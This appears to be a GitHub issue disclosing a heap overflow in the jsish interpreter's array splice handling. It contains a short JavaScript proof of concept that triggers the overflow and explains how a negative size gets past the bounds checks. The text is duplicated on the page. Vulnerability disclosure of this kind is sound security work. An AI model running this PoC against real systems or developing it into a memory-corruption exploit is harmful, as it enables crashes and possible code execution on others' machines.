You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
operating system: ubuntu18.04
compile command: ./configure && make
test command: ./jsish poc1
poc:
var o = [
1,
2
];
var JAZh = -2147483647 == -9007199254740991;
o = o.splice(o.length, o.length, o, o, o.length, 1.7976931348623157e+308);
o.length = o.length != o;
var itMb = 10000 <= -2147483648;
o = o.constructor();
var QHiF = o.length < o.length;
var a = Object.keys(o);
o.length = ~-9007199254740992;
var APSB = -9007199254740990 != a.length;
o = o.splice(o.length, a.length, 9007199254740994, o, APSB, 759250124);
vulnerability description:
The code that caused the vulnerability is in line src / jsiObj.c + 417, the function jsi_ObjArraySizer, the code is as follows:
The parameter len is the length of the Array. The PoC is initially set to a maximum value by o.length:
Then call Jsi_ObjArraySizer in jsi_ArraySpliceCmd. After the code calculation, nsiz is calculated as a negative number, which can bypass the two checks of line 421 and line 425,
The affected code is as follows: obj-> arr will obtain a smaller heap space through Jsi_Realloc, and then memset assigns a value to the space pointed to by obj-> arr + obj-> arrMaxSize, but this time has exceeded the actual heap range of obj-> arr, causing Heap overflow.
The text was updated successfully, but these errors were encountered:
Enviroment
poc:
vulnerability description:
The code that caused the vulnerability is in line src / jsiObj.c + 417, the function jsi_ObjArraySizer, the code is as follows:
The parameter
len
is the length of the Array. The PoC is initially set to a maximum value byo.length
:Then call
Jsi_ObjArraySizer
injsi_ArraySpliceCmd
. After the code calculation,nsiz
is calculated as a negative number, which can bypass the two checks of line 421 and line 425,The affected code is as follows:
obj-> arr
will obtain a smaller heap space throughJsi_Realloc
, and then memset assigns a value to the space pointed to byobj-> arr + obj-> arrMaxSize
, but this time has exceeded the actual heap range ofobj-> arr
, causing Heap overflow.The text was updated successfully, but these errors were encountered: